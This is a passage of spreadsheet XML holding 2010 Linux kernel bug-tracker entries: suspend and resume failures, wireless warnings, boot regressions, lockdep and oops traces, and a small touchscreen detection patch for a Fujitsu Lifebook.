    <t>2010-01-21 08:56 UTC</t>
  </si>
  <si>
    <t>2011-01-16 22:54 UTC</t>
  </si>
  <si>
    <t>If I suspend to RAM my ThinkPad T400 at home (docking station with 1680x1050 HDMI2 monitor) and switch to my office (internal LVDS1 with 1440x900) and resume my notebook by opening the lid, the screen is black. Ctrl+Alt+Backspace works however. This wasn't the case with 2.6.31.X kernels. Starting with 2.6.32.X however now I'm facing this issue.</t>
  </si>
  <si>
    <t>Jérémy Lal</t>
  </si>
  <si>
    <t>ThinkPad key on T20 only works after suspend cycle</t>
  </si>
  <si>
    <t>2010-01-24 11:14 UTC</t>
  </si>
  <si>
    <t>Reported-by: Florian Zumbiehl &lt;florz@florz.de&gt; The vendor ("ThinkPad") key on a T20 with latest T22 BIOS only works after a S3 suspend/resume cycle. Tested with direct (no userspace script) S3 sleep. The T20 is running a patched kernel to fix the EC DoS problem. The key is operating in NVRAM polling mode. It breaks again when thinkpad-acpi is unloaded and then reloaded. Driver hotkey state dump: | /sys/bus/platform/devices/thinkpad_acpi/hotkey_all_mask:0x0088080c | /sys/bus/platform/devices/thinkpad_acpi/hotkey_bios_enabled:0 | /sys/bus/platform/devices/thinkpad_acpi/hotkey_bios_mask:0x0000080c | /sys/bus/platform/devices/thinkpad_acpi/hotkey_enable:1 | /sys/bus/platform/devices/thinkpad_acpi/hotkey_mask:0x0088080c | /sys/bus/platform/devices/thinkpad_acpi/hotkey_poll_freq:10 | /sys/bus/platform/devices/thinkpad_acpi/hotkey_recommended_mask:0x0088080c | /sys/bus/platform/devices/thinkpad_acpi/hotkey_report_mode:1 | /sys/bus/platform/devices/thinkpad_acpi/hotkey_source_mask:0x00880000</t>
  </si>
  <si>
    <t>iwl_bg_scan_completed: WARN on scan complete</t>
  </si>
  <si>
    <t>2.6.33-rc5</t>
  </si>
  <si>
    <t>2010-01-24 12:27 UTC</t>
  </si>
  <si>
    <t>Alex Zhavnerchik</t>
  </si>
  <si>
    <t>2010-02-07 21:10 UTC</t>
  </si>
  <si>
    <t>I have following warning in my kernel.log, don't really know what does this mean. If I can make my report more helpful please instruct me how to do it. I'm not sure if this is a regression but I think in previous versions I did'n see such warnings Jan 23 18:45:32 loki kernel: [17577.887406] ------------[ cut here ]------------ Jan 23 18:45:32 loki kernel: [17577.887415] wlan0: associate with AP 00:24:01:bc:51:09 (try 1) Jan 23 18:45:32 loki kernel: [17577.887454] WARNING: at net/mac80211/scan.c:309 ieee80211_scan_completed+0x44/0x1e9 [mac80211]() Jan 23 18:45:32 loki kernel: [17577.887460] Hardware name: 64608SG Jan 23 18:45:32 loki kernel: [17577.887464] Modules linked in: snd_seq_dummy sco bridge stp bnep rfcomm l2cap vboxnetadp vboxnetflt autofs4 acpi_cpufreq cpufreq_conservative cpufreq_userspace cpufreq_powersave cpufreq_stats uinput microcode fuse vboxdrv firewire_sbp2 loop btusb bluetooth snd_hda_codec_analog snd_hda_intel snd_hda_codec snd_hwdep snd_pcm_oss snd_mixer_oss snd_pcm thinkpad_acpi snd_seq_midi snd_rawm idi arc4 snd_seq_midi_event ecb iwlagn snd_seq iwlcore mac80211 snd_timer snd_seq_device pcmcia snd cfg80211 yenta_socket rfkill rsrc_nonst atic psmouse snd_page_alloc soundcore evdev pcmcia_core video i2c_i801 output serio_raw pcspkr joydev battery button ac processor wmi nvram ext4 mbcache jbd2 crc16 sd_mod crc_t10dif ide_cd_mod cdrom ata_generic ata_piix usbhid hid ide_pci_generic ahci sdhci_pci sdhci libata fir ewire_ohci mmc_core piix uhci_hcd led_class ricoh_mmc firewire_core crc_itu_t ide_core scsi_mod ehci_hcd e1000e intel_agp thermal fan therm al_sys nouveau ttm drm_kms_helper drm i2c_algo_bit [ Jan 23 18:45:32 loki kernel: last unloaded: scsi_wait_scan] Jan 23 18:45:32 loki kernel: [17577.887650] Pid: 1299, comm: iwlagn Not tainted 2.6.33-rc5 #1 Jan 23 18:45:32 loki kernel: [17577.887655] Call Trace: Jan 23 18:45:32 loki kernel: [17577.887672] [&lt;ffffffff8103c0e8&gt;] warn_slowpath_common+0x77/0x8f Jan 23 18:45:32 loki kernel: [17577.887682] [&lt;ffffffff8103c10f&gt;] warn_slowpath_null+0xf/0x11 Jan 23 18:45:32 loki kernel: [17577.887702] [&lt;ffffffffa047c77b&gt;] ieee80211_scan_completed+0x44/0x1e9 [mac80211] Jan 23 18:45:32 loki kernel: [17577.887730] [&lt;ffffffffa04b1438&gt;] iwl_bg_scan_completed+0x3a/0x75 [iwlcore] Jan 23 18:45:32 loki kernel: [17577.887741] [&lt;ffffffff81051b0b&gt;] worker_thread+0x1a4/0x232 Jan 23 18:45:32 loki kernel: [17577.887765] [&lt;ffffffffa04b13fe&gt;] ? iwl_bg_scan_completed+0x0/0x75 [iwlcore] Jan 23 18:45:32 loki kernel: [17577.887776] [&lt;ffffffff81055703&gt;] ? autoremove_wake_function+0x0/0x34 Jan 23 18:45:32 loki kernel: [17577.887786] [&lt;ffffffff8102d0c7&gt;] ? spin_unlock_irqrestore+0x9/0xb Jan 23 18:45:32 loki kernel: [17577.887795] [&lt;ffffffff81051967&gt;] ? worker_thread+0x0/0x232 Jan 23 18:45:32 loki kernel: [17577.887804] [&lt;ffffffff810552b7&gt;] kthread+0x7a/0x82 Jan 23 18:45:32 loki kernel: [17577.887813] [&lt;ffffffff81003824&gt;] kernel_thread_helper+0x4/0x10 Jan 23 18:45:32 loki kernel: [17577.887822] [&lt;ffffffff8105523d&gt;] ? kthread+0x0/0x82 Jan 23 18:45:32 loki kernel: [17577.887829] [&lt;ffffffff81003820&gt;] ? kernel_thread_helper+0x0/0x10 Jan 23 18:45:32 loki kernel: [17577.887836] ---[ end trace daa13a680bc3a113 ]---</t>
  </si>
  <si>
    <t>laptop hangs up on s2disk - Lenovo thinkpad T61</t>
  </si>
  <si>
    <t>2.6.33-rc6</t>
  </si>
  <si>
    <t>2010-01-24 12:44 UTC</t>
  </si>
  <si>
    <t>Hi. I use Lenovo thinkpad T61 with nouveau drm, sometimes it suspends to disk without any problems and resume is always OK. But sometimes (most times actually) it hangs up and I just see "Snapshoting system" message, it blink several times with HDD LED and "moon" LED (everybody who used T61 can understand me :)) is blinking all the time, till I shutdown the PC. Kernel config in attach. If I can make this bug report more useful/helpful please instruct me.</t>
  </si>
  <si>
    <t>GSPCA T613+STK014 V4L2-spec-violations</t>
  </si>
  <si>
    <t>2010-01-24 17:01 UTC</t>
  </si>
  <si>
    <t>2011-05-30 08:24 UTC</t>
  </si>
  <si>
    <t>The T613/STK014-gspcav-subdrivers are violating the V4L2-spec, because they define menu-controls (in both cases: V4L2_CID_POWER_LINE_FREQUENCY) with a start-index &gt; 0. According to V4L2-spec v0.24, first index of menu-controls is always zero. It is also not specified that v4l2_queryctrl.minimum must be set to the start-index. This may cause applications to not use the control if they stop enumeration of the menu-items if the VIDIOC_QUERYMENU-ioctl fails for the first index. See t613.c line 174, stk014.c line 104</t>
  </si>
  <si>
    <t>PCI host bridge windows ignored (works with pci=use_crs)</t>
  </si>
  <si>
    <t>2010-01-24 19:45 UTC</t>
  </si>
  <si>
    <t>2010-02-02 21:13 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.33-rc3: pci host bridge windows ignored (works with pci=use_crs) Submitter : Jeff Garrett &lt;jeff@jgarrett.org&gt; Date : 2010-01-13 5:37 References : http://marc.info/?l=linux-kernel&amp;m=126336296600307&amp;w=4 Handled-By : Yinghai Lu &lt;yinghai@kernel.org&gt; Handled-By : Bjorn Helgaas &lt;bjorn.helgaas@hp.com&gt; This entry is being used for tracking a regression from 2.6.32. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Bluetooth: sleeping function called from invalid context</t>
  </si>
  <si>
    <t>2010-01-24 20:04 UTC</t>
  </si>
  <si>
    <t>2010-02-11 10:46 UTC</t>
  </si>
  <si>
    <t>Subject : BUG: Commit 9e726b17 (Bluetooth: Fix rejected connection not disconnecting ACL link) causes trace Submitter : David John &lt;davidjon@xenontk.org&gt; Date : 2010-01-12 9:19 References : http://marc.info/?l=linux-kernel&amp;m=126328727021949&amp;w=4 This entry is being used for tracking a regression from 2.6.31. Please don't close it until the problem is fixed in the mainline. Caused by: commit 9e726b17422bade75fba94e625cd35fd1353e682 Author: Luiz Augusto von Dentz &lt;luiz.dentz@openbossa.org&gt; Date: Wed Jul 15 13:50:58 2009 -0300 Bluetooth: Fix rejected connection not disconnecting ACL link Signed-off-by: Luiz Augusto von Dentz &lt;luiz.dentz@openbossa.org&gt; Signed-off-by: Marcel Holtmann &lt;marcel@holtmann.org&gt; First-Bad-Commit : 9e726b17422bade75fba94e625cd35fd1353e682</t>
  </si>
  <si>
    <t>Boot regression on AMD</t>
  </si>
  <si>
    <t>2.6.33-rc4</t>
  </si>
  <si>
    <t>2010-01-24 20:11 UTC</t>
  </si>
  <si>
    <t>2010-01-27 19:29 UTC</t>
  </si>
  <si>
    <t>Subject : Re: Linux 2.6.33-rc4, boot regression still exists Submitter : Gene Heskett &lt;gene.heskett@verizon.net&gt; Date : 2010-01-13 20:21 References : http://marc.info/?l=linux-kernel&amp;m=126341413213017&amp;w=4 Handled-By : Andreas Herrmann &lt;andreas.herrmann3@amd.com&gt; Patch : http://patchwork.kernel.org/patch/74883/ This entry is being used for tracking a regression from 2.6.32. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>[drm:i915_gem_execbuffer] *ERROR* i915_gem_do_execbuffer returns -512</t>
  </si>
  <si>
    <t>2.6.33-rc4-git1</t>
  </si>
  <si>
    <t>2010-01-24 20:18 UTC</t>
  </si>
  <si>
    <t>2010-01-27 21:03 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.33-rc4-git1 -- [drm:i915_gem_execbuffer] *ERROR* i915_gem_do_execbuffer returns -512 Submitter : Miles Lane &lt;miles.lane@gmail.com&gt; Date : 2010-01-14 23:18 References : http://lkml.org/lkml/2010/1/14/570 Handled-By : Chris Wilson &lt;chris@chris-wilson.co.uk&gt; This entry is being used for tracking a regression from 2.6.32. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>[OOPS] radeon kms</t>
  </si>
  <si>
    <t>2010-01-24 20:24 UTC</t>
  </si>
  <si>
    <t>2010-01-26 12:02 UTC</t>
  </si>
  <si>
    <t>Subject : [OOPS] radeon kms Submitter : John Kacur &lt;jkacur@redhat.com&gt; Date : 2010-01-15 15:45 References : http://lkml.org/lkml/2010/1/15/129 Handled-By : Jerome Glisse &lt;glisse@freedesktop.org&gt; Patch : http://git.kernel.org/?p=linux/kernel/git/airlied/drm-2.6.git;a=patch;h=30d2d9a54d48e4fefede0389ded1b6fc2d44a522 This entry is being used for tracking a regression from 2.6.. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Wake on LAN doesn't work in sky2</t>
  </si>
  <si>
    <t>2010-01-24 20:32 UTC</t>
  </si>
  <si>
    <t>2010-01-26 11:57 UTC</t>
  </si>
  <si>
    <t>Subject : Regression: Wake on LAN doesn't work in sky2 with 2.6.33-rc4-git2 Submitter : Tino Keitel &lt;tino.keitel@tikei.de&gt; Date : 2010-01-15 9:10 References : http://marc.info/?l=linux-kernel&amp;m=126354704815848&amp;w=4 Handled-By : Stephen Hemminger &lt;shemminger@vyatta.com&gt; This entry is being used for tracking a regression from 2.6.. Please don't close it until the problem is fixed in the mainline. Caused by: commit 166a0fd4c788ec7f10ca8194ec6d526afa12db75 Author: stephen hemminger &lt;shemminger@vyatta.com&gt; Date: Mon Dec 14 08:50:12 2009 +0000 sky2: leave PCI config space writeable Since power management is done by PCI subsystem as well as driver, don't toggle the bit that disables PCI register writes. Signed-off-by: Stephen Hemminger &lt;shemminger@vyatta.com&gt; Acked-by: Rafael J. Wysocki &lt;rjw@sisk.pl&gt; Signed-off-by: David S. Miller &lt;davem@davemloft.net&gt; First-Bad-Commit : 166a0fd4c788ec7f10ca8194ec6d526afa12db75</t>
  </si>
  <si>
    <t>gobi_loader hangs after commit 8e8dce065088</t>
  </si>
  <si>
    <t>2010-01-24 20:42 UTC</t>
  </si>
  <si>
    <t>2011-02-02 09:13 UTC</t>
  </si>
  <si>
    <t>Subject : [REGRESSION] "USB: use kfifo to buffer usb-generic serial writes" causes gobi_loader to hang Submitter : Matthew Garrett &lt;mjg59@srcf.ucam.org&gt; Date : 2010-01-17 2:55 References : http://marc.info/?l=linux-kernel&amp;m=126369696509502&amp;w=4 Handled-By : Oliver Neukum &lt;oliver@neukum.org&gt; Handled-By : Alan Cox &lt;alan@lxorguk.ukuu.org.uk&gt; Patch : http://patchwork.kernel.org/patch/73878/ This entry is being used for tracking a regression from 2.6.31. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Kernel 2.6.32.x hangs during boot process</t>
  </si>
  <si>
    <t>2010-01-24 20:47 UTC</t>
  </si>
  <si>
    <t>2010-02-07 23:13 UTC</t>
  </si>
  <si>
    <t>Subject : [BUG] kernel 2.6.32.x hangs during boot process Submitter : François Figarola &lt;francois.figarola@i-consult.fr&gt; Date : 2010-01-16 9:58 References : http://marc.info/?l=linux-kernel&amp;m=126363593817261&amp;w=4 This entry is being used for tracking a regression from 2.6.31. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>clockevents patch causes hang on power off</t>
  </si>
  <si>
    <t>2010-01-24 20:56 UTC</t>
  </si>
  <si>
    <t>2010-01-24 21:26 UTC</t>
  </si>
  <si>
    <t>Subject : [REGRESSION] clockevents patch causes hang on power off Submitter : Nathan Williams &lt;ngwilliams@gmail.com&gt; Date : 2010-01-23 1:21 References : http://marc.info/?l=linux-kernel&amp;m=126420970924627&amp;w=4 Handled-By : Xiaotian Feng &lt;dfeng@redhat.com&gt; Patch : http://patchwork.kernel.org/patch/71537/ This entry is being used for tracking a regression from 2.6.32. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>NULL pointer dereference in vlan_skb_recv</t>
  </si>
  <si>
    <t>2010-01-24 21:00 UTC</t>
  </si>
  <si>
    <t>2010-01-26 11:55 UTC</t>
  </si>
  <si>
    <t>Subject : [2.6.33-rc5 regression] NULL pointer dereference in vlan_skb_recv - probably introduced by commit 9793241fe92f7d9303fb221e43fc598eb065f267 Submitter : Bruno Prémont &lt;bonbons@linux-vserver.org&gt; Date : 2010-01-23 15:56 References : http://marc.info/?l=linux-kernel&amp;m=126426286507497&amp;w=4 Handled-By : Eric Dumazet &lt;eric.dumazet@gmail.com&gt; Patch : http://patchwork.kernel.org/patch/74999/ This entry is being used for tracking a regression from 2.6.. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>[PATCH] Generic PS/2 mouse detected on Fujitsu Lifebook B-Series model laptop instead of LBPS/2 Fujitsu Lifebook TouchScreen</t>
  </si>
  <si>
    <t>2010-01-25 03:01 UTC</t>
  </si>
  <si>
    <t>jon</t>
  </si>
  <si>
    <t>2010-05-24 20:43 UTC</t>
  </si>
  <si>
    <t>This bug is an other instance of bug ID 5335 (http://bugzilla.kernel.org/show_bug.cgi?id=5335). On certain models of Fujitsu Lifebook B-Series laptops the product name DMI string is not recognised by the kernel, and so the touch screen is recognised as a standard PS/2 mouse. The Product Name DMI string for this laptop is 'Lifebook B Series', and can be found with dmidecode (version 2.9 used in this case). A similar fix can be implemented as in bug#5335 so the touch screen is recognised. Looking at the latest stable release (2.6.32.5) it appears to have the same problem. diff -Nurb linux-2.6.26.2/drivers/input/mouse/lifebook.c linux-2.6.26.2_patched/drivers/input/mouse/lifebook.c --- linux-2.6.26.2/drivers/input/mouse/lifebook.c 2008-08-06 17:19:01.000000000 +0100 +++ linux-2.6.26.2_patched/drivers/input/mouse/lifebook.c 2010-01-25 02:56:41.000000000 +0000 @@ -51,6 +51,12 @@ { .ident = "LifeBook B", .matches = { + DMI_MATCH(DMI_PRODUCT_NAME, "Lifebook B Series"), + }, + }, + { + .ident = "LifeBook B", + .matches = { DMI_MATCH(DMI_PRODUCT_NAME, "LifeBook B Series"), }, },</t>
  </si>
  <si>
    <t>sysfs-related lockdep warning in __blkdev_get</t>
  </si>
  <si>
    <t>2.6.33-0.18.rc4.git7.fc13.x86_64</t>
  </si>
  <si>
    <t>2010-01-25 13:38 UTC</t>
  </si>
  <si>
    <t>Matti Aarnio</t>
  </si>
  <si>
    <t>2010-03-22 00:20 UTC</t>
  </si>
  <si>
    <t>During boot a 3+1 disk RAID5 array with one out-of-state disk is being assembled. Kernel RAID5 notices component statuses, and does correct thing, but with lock trouble being indicated. The troubled component device in my RAID5 array is correctly kicked out of the array and system boots up, so this is not a _fatal_ thing in itself. The array gets fixed over next about 12 hours and no further lock troubles appear. Previous boot (untroubled) had some 2.6.32 series kernel. This was first entered as Fedora bug: https://bugzilla.redhat.com/show_bug.cgi?id=558230 but it most likely is direct "upstream issue" Kernel dmesg report generated during boot: dracut: Autoassembling MD Raid md: md0 stopped. md: bind&lt;sdc1&gt; md: bind&lt;sdb1&gt; md: bind&lt;sdd1&gt; md: bind&lt;sda1&gt; md: kicking non-fresh sdd1 from array! ======================================================= [ INFO: possible circular locking dependency detected ] 2.6.33-0.18.rc4.git7.fc13.x86_64 #1 ------------------------------------------------------- mdadm/474 is trying to acquire lock: (s_active){++++.+}, at: [&lt;ffffffff81175fde&gt;] sysfs_addrm_finish+0x36/0x55 but task is already holding lock: (&amp;bdev-&gt;bd_mutex){+.+.+.}, at: [&lt;ffffffff811451c4&gt;] bd_release_from_disk+0x3a/0xec which lock already depends on the new lock. the existing dependency chain (in reverse order) is: -&gt; #2 (&amp;bdev-&gt;bd_mutex){+.+.+.}: [&lt;ffffffff8107e402&gt;] __lock_acquire+0xb71/0xd19 [&lt;ffffffff8107e686&gt;] lock_acquire+0xdc/0x102 [&lt;ffffffff814757ee&gt;] __mutex_lock_common+0x4b/0x392 [&lt;ffffffff81475bf9&gt;] mutex_lock_nested+0x3e/0x43 [&lt;ffffffff81144570&gt;] __blkdev_get+0x91/0x395 [&lt;ffffffff81144884&gt;] blkdev_get+0x10/0x12 [&lt;ffffffff81144dc5&gt;] open_by_devnum+0x2e/0x3f [&lt;ffffffff813856eb&gt;] lock_rdev+0x39/0xe4 [&lt;ffffffff81385881&gt;] md_import_device+0xeb/0x2aa [&lt;ffffffff81389fd9&gt;] add_new_disk+0x71/0x441 [&lt;ffffffff8138c127&gt;] md_ioctl+0xa01/0xf49 [&lt;ffffffff8121afd5&gt;] __blkdev_driver_ioctl+0x39/0xa3 [&lt;ffffffff8121b970&gt;] blkdev_ioctl+0x67d/0x6b1 [&lt;ffffffff81143b90&gt;] block_ioctl+0x37/0x3b [&lt;ffffffff8112af18&gt;] vfs_ioctl+0x32/0xa6 [&lt;ffffffff8112b498&gt;] do_vfs_ioctl+0x490/0x4d6 [&lt;ffffffff8112b534&gt;] sys_ioctl+0x56/0x79 [&lt;ffffffff81009c32&gt;] system_call_fastpath+0x16/0x1b -&gt; #1 (&amp;new-&gt;reconfig_mutex){+.+.+.}: [&lt;ffffffff8107e402&gt;] __lock_acquire+0xb71/0xd19 [&lt;ffffffff8107e686&gt;] lock_acquire+0xdc/0x102 [&lt;ffffffff814757ee&gt;] __mutex_lock_common+0x4b/0x392 [&lt;ffffffff81475b73&gt;] mutex_lock_interruptible_nested+0x3e/0x43 [&lt;ffffffff813844ee&gt;] mddev_lock+0x17/0x19 [&lt;ffffffff813847c5&gt;] md_attr_show+0x32/0x5d [&lt;ffffffff81174e64&gt;] sysfs_read_file+0xbd/0x17f [&lt;ffffffff8111e4d1&gt;] vfs_read+0xab/0x108 [&lt;ffffffff8111e5ee&gt;] sys_read+0x4a/0x6e [&lt;ffffffff81009c32&gt;] system_call_fastpath+0x16/0x1b -&gt; #0 (s_active){++++.+}: [&lt;ffffffff8107e2ac&gt;] __lock_acquire+0xa1b/0xd19 [&lt;ffffffff8107e686&gt;] lock_acquire+0xdc/0x102 [&lt;ffffffff811759eb&gt;] sysfs_deactivate+0x9a/0x103 [&lt;ffffffff81175fde&gt;] sysfs_addrm_finish+0x36/0x55 [&lt;ffffffff8117434c&gt;] sysfs_hash_and_remove+0x53/0x6a [&lt;ffffffff81176567&gt;] sysfs_remove_link+0x21/0x23 [&lt;ffffffff81143f28&gt;] del_symlink+0x1b/0x1d [&lt;ffffffff8114520b&gt;] bd_release_from_disk+0x81/0xec [&lt;ffffffff813840c8&gt;] unbind_rdev_from_array+0x67/0x154 [&lt;ffffffff81386327&gt;] kick_rdev_from_array+0x16/0x23 [&lt;ffffffff8138946c&gt;] do_md_run+0x1a1/0x873 [&lt;ffffffff8138c408&gt;] md_ioctl+0xce2/0xf49 [&lt;ffffffff8121afd5&gt;] __blkdev_driver_ioctl+0x39/0xa3 [&lt;ffffffff8121b970&gt;] blkdev_ioctl+0x67d/0x6b1 [&lt;ffffffff81143b90&gt;] block_ioctl+0x37/0x3b [&lt;ffffffff8112af18&gt;] vfs_ioctl+0x32/0xa6 [&lt;ffffffff8112b498&gt;] do_vfs_ioctl+0x490/0x4d6 [&lt;ffffffff8112b534&gt;] sys_ioctl+0x56/0x79 [&lt;ffffffff81009c32&gt;] system_call_fastpath+0x16/0x1b other info that might help us debug this: 2 locks held by mdadm/474: #0: (&amp;new-&gt;reconfig_mutex){+.+.+.}, at: [&lt;ffffffff813844ee&gt;] mddev_lock+0x17/0x19 #1: (&amp;bdev-&gt;bd_mutex){+.+.+.}, at: [&lt;ffffffff811451c4&gt;] bd_release_from_disk+0x3a/0xec stack backtrace: Pid: 474, comm: mdadm Not tainted 2.6.33-0.18.rc4.git7.fc13.x86_64 #1 Call Trace: [&lt;ffffffff8107d46f&gt;] print_circular_bug+0xa8/0xb6 [&lt;ffffffff8107e2ac&gt;] __lock_acquire+0xa1b/0xd19 [&lt;ffffffff8107e686&gt;] lock_acquire+0xdc/0x102 [&lt;ffffffff81175fde&gt;] ? sysfs_addrm_finish+0x36/0x55 [&lt;ffffffff8107c15e&gt;] ? lockdep_init_map+0x9e/0x113 [&lt;ffffffff811759eb&gt;] sysfs_deactivate+0x9a/0x103 [&lt;ffffffff81175fde&gt;] ? sysfs_addrm_finish+0x36/0x55 [&lt;ffffffff8147560d&gt;] ? __mutex_unlock_slowpath+0x120/0x132 [&lt;ffffffff81175fde&gt;] sysfs_addrm_finish+0x36/0x55 [&lt;ffffffff8117434c&gt;] sysfs_hash_and_remove+0x53/0x6a [&lt;ffffffff81176567&gt;] sysfs_remove_link+0x21/0x23 [&lt;ffffffff81143f28&gt;] del_symlink+0x1b/0x1d [&lt;ffffffff8114520b&gt;] bd_release_from_disk+0x81/0xec [&lt;ffffffff813840c8&gt;] unbind_rdev_from_array+0x67/0x154 [&lt;ffffffff814743e1&gt;] ? printk+0x41/0x48 [&lt;ffffffff81386327&gt;] kick_rdev_from_array+0x16/0x23 [&lt;ffffffff8138946c&gt;] do_md_run+0x1a1/0x873 [&lt;ffffffff8138c408&gt;] md_ioctl+0xce2/0xf49 [&lt;ffffffff81010385&gt;] ? native_sched_clock+0x2d/0x5f [&lt;ffffffff81070ffc&gt;] ? cpu_clock+0x43/0x5e [&lt;ffffffff8121afd5&gt;] __blkdev_driver_ioctl+0x39/0xa3 [&lt;ffffffff8107b913&gt;] ? lock_release_holdtime+0x2c/0xdb [&lt;ffffffff8121b970&gt;] blkdev_ioctl+0x67d/0x6b1 [&lt;ffffffff81143b90&gt;] block_ioctl+0x37/0x3b [&lt;ffffffff8112af18&gt;] vfs_ioctl+0x32/0xa6 [&lt;ffffffff8112b498&gt;] do_vfs_ioctl+0x490/0x4d6 [&lt;ffffffff8112b534&gt;] sys_ioctl+0x56/0x79 [&lt;ffffffff81009c32&gt;] system_call_fastpath+0x16/0x1b md: unbind&lt;sdd1&gt; md: export_rdev(sdd1)</t>
  </si>
  <si>
    <t>HDA Intel Audio hang on boot</t>
  </si>
  <si>
    <t>2010-01-25 21:10 UTC</t>
  </si>
  <si>
    <t>2010-02-14 21:49 UTC</t>
  </si>
  <si>
    <t>Subject : HDA Intel Audio hang on boot Submitter : Sid Boyce &lt;sboyce@blueyonder.co.uk&gt; Date : 2010-01-15 1:24 References : http://marc.info/?l=linux-kernel&amp;m=126351866722507&amp;w=4 Notify-Also : Takashi Iwai &lt;tiwai@suse.de&gt; This entry is being used for tracking a regression from 2.6.32. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Black screen after loading nouveau module</t>
  </si>
  <si>
    <t>2010-01-27 21:38 UTC</t>
  </si>
  <si>
    <t>2010-02-23 21:20 UTC</t>
  </si>
  <si>
    <t>Created attachment 24747 [details] kernel log As mentioned in subj after loading nouveau module I see just black screen. Before today it worked well, I turned off the power and after that it don't show me the image. Firmware on it's place as it was previous time.</t>
  </si>
  <si>
    <t>2.6.32.6 hang at boot with ati x1600</t>
  </si>
  <si>
    <t>2.6.32.6</t>
  </si>
  <si>
    <t>2010-01-28 05:02 UTC</t>
  </si>
  <si>
    <t>2010-10-26 09:48 UTC</t>
  </si>
  <si>
    <t>2.6.32.6 hang at boot. youtube video here: http://www.youtube.com/watch?v=FY767yw0T68 2.6.31.9 works fine (3d/2d/suspend/kms).</t>
  </si>
  <si>
    <t>iwlagn doesn't work after resume - acer_wmi rfkill state not restored - Lenovo Ideapad u330</t>
  </si>
  <si>
    <t>2010-01-28 20:14 UTC</t>
  </si>
  <si>
    <t>Michał Witkowski</t>
  </si>
  <si>
    <t>Hi, This is my first bug report so please be forigiving ;) i've got a Lenovo Ideapad u330. When testing a new kernel (vanilla 2.6.33-rc5) i notived that my Intel 5100 AGN wifi stopped working after resume. It wouldn't even start workign after reloading cfg80211, iwlcore and iwlagn. Whenever I tried upping the interface (necessary for example for scanning) I got: SIOCSIFFLAGS: Unknown error 132 And this is the only error I've got _anywhere_. After resume, the card is simple dead under 2.6.33-rc5. Please note, under 2.6.32.5 everything works fine. I attach dmesg output of init under 2.6.33-rc5, after resume and after reloading modules. To my knowledge, none of these provide any clues... Sometimes, during initialization it gives an error: iwlagn 0000:03:00.0: firmware: requesting iwlwifi-5000-2.ucode NET: Registered protocol family 10 iwlagn 0000:03:00.0: loaded firmware version 8.24.2.12 iwlagn 0000:03:00.0: Could not load the INST uCode section due to interrupt iwlagn 0000:03:00.0: Unable to set up bootstrap uCode: -512 iwlagn 0000:03:00.0: Could not load the INST uCode section due to interrupt iwlagn 0000:03:00.0: Unable to set up bootstrap uCode: -512 iwlagn 0000:03:00.0: Could not load the INST uCode section due to interrupt iwlagn 0000:03:00.0: Unable to set up bootstrap uCode: -512 iwlagn 0000:03:00.0: Could not load the INST uCode section due to interrupt iwlagn 0000:03:00.0: Unable to set up bootstrap uCode: -512 iwlagn 0000:03:00.0: Could not load the INST uCode section due to interrupt iwlagn 0000:03:00.0: Unable to set up bootstrap uCode: -512 iwlagn 0000:03:00.0: Unable to initialize device after 5 attempts. Regardles of whether or not these things appear on init, iwlagn works on kernel 2.6.33-rc5 until I suspend/resume.</t>
  </si>
  <si>
    <t>Lenovo Ideapad line support in acer_wmi?</t>
  </si>
  <si>
    <t>kernel26-rc</t>
  </si>
  <si>
    <t>2010-01-28 22:20 UTC</t>
  </si>
  <si>
    <t>Created attachment 24772 [details] Lenovo Idepad U330 DSDT Hi, I've noticed that in kernel 2.6.33-rc5, acer_wmi started getting loaded for my Lenovo Ideapad U330 laptop. Somehow, out of the blue, it started loading and doing weird stuff to me wifi rfkill (bug 15164), which... is a good thing :) First of all, the wifi rfkill works using acer_wmi, which gives some hope :) Second, it seems that my Ideapad shares quite a lot of code with other Acers, namely 4810TG. I was able to turn off my Ati card and use only the Intel one in switchable graphics mode, thanks to this code made for Acer laptops: http://ubuntuforums.org/showpost.php?p=7933876&amp;postcount=11. I've poked around my DSDT and it seems that the AMW0 and WMI0 things are there. Under Windows, there is a separate software rfkill for WiFi and Bluetooth, but both of these are controlled by the hardware switch. It would be fantastic to be able to use the bluetooth rfkill under Linux. Could someone, who is more familiar with all this low-level stuff, please take a look into the DSDT of my laptop and tell me if there is any faint possiblity of it being compatible with acer_wmi? Also, the dmi stuff on my laptop is a little borked, as dmidecode reports: Handle 0x0001, DMI type 1, 27 bytes System Information Manufacturer: LENOVO Product Name: INVALID Version: Lenovo IdeaPad U330 Serial Number: 1S168001975001MX UUID: 4E1237A0-8374-11DD-886A-E9467D20CD40 Wake-up Type: Power Switch SKU Number: Montevina_Fab Family: Intel_Mobile Strange that Version holds the Product Name, but that's life.</t>
  </si>
  <si>
    <t>Wireless card problem on Acer Extes</t>
  </si>
  <si>
    <t>2.6.31.8-0.1-default</t>
  </si>
  <si>
    <t>2010-01-29 13:15 UTC</t>
  </si>
  <si>
    <t>Fabrizio</t>
  </si>
  <si>
    <t>2010-08-13 23:48 UTC</t>
  </si>
  <si>
    <t>I have a wireless card AR928X Wireless Network Adapter, and use openSuse 11.2. When I use the wireless card too much (downloading a lot of things), I hear a system beep and suddenly connection breaks up and it doesn't connect until reboot. This is what I get (localmessages): Jan 29 11:29:21 linux-g3rs checkproc: checkproc: can not get session id for process 2361! Jan 29 12:08:00 linux-g3rs checkproc: checkproc: can not get session id for process 2366! Jan 29 12:10:36 linux-g3rs checkproc: checkproc: can not get session id for process 2135! This is what I get on the screen: Message from syslogd@linux-g3rs at Jan 29 14:04:45 ... kernel:[ 3696.159359] Oops: 0000 [#1] SMP Message from syslogd@linux-g3rs at Jan 29 14:04:45 ... kernel:[ 3696.159369] last sysfs file: /sys/devices/pci0000:00/0000:00:1a.0/usb3/3-1/devnum Message from syslogd@linux-g3rs at Jan 29 14:04:45 ... kernel:[ 3696.159713] Process phy0 (pid: 534, ti=f515a000 task=f66f6270 task.ti=f515a000) Message from syslogd@linux-g3rs at Jan 29 14:04:45 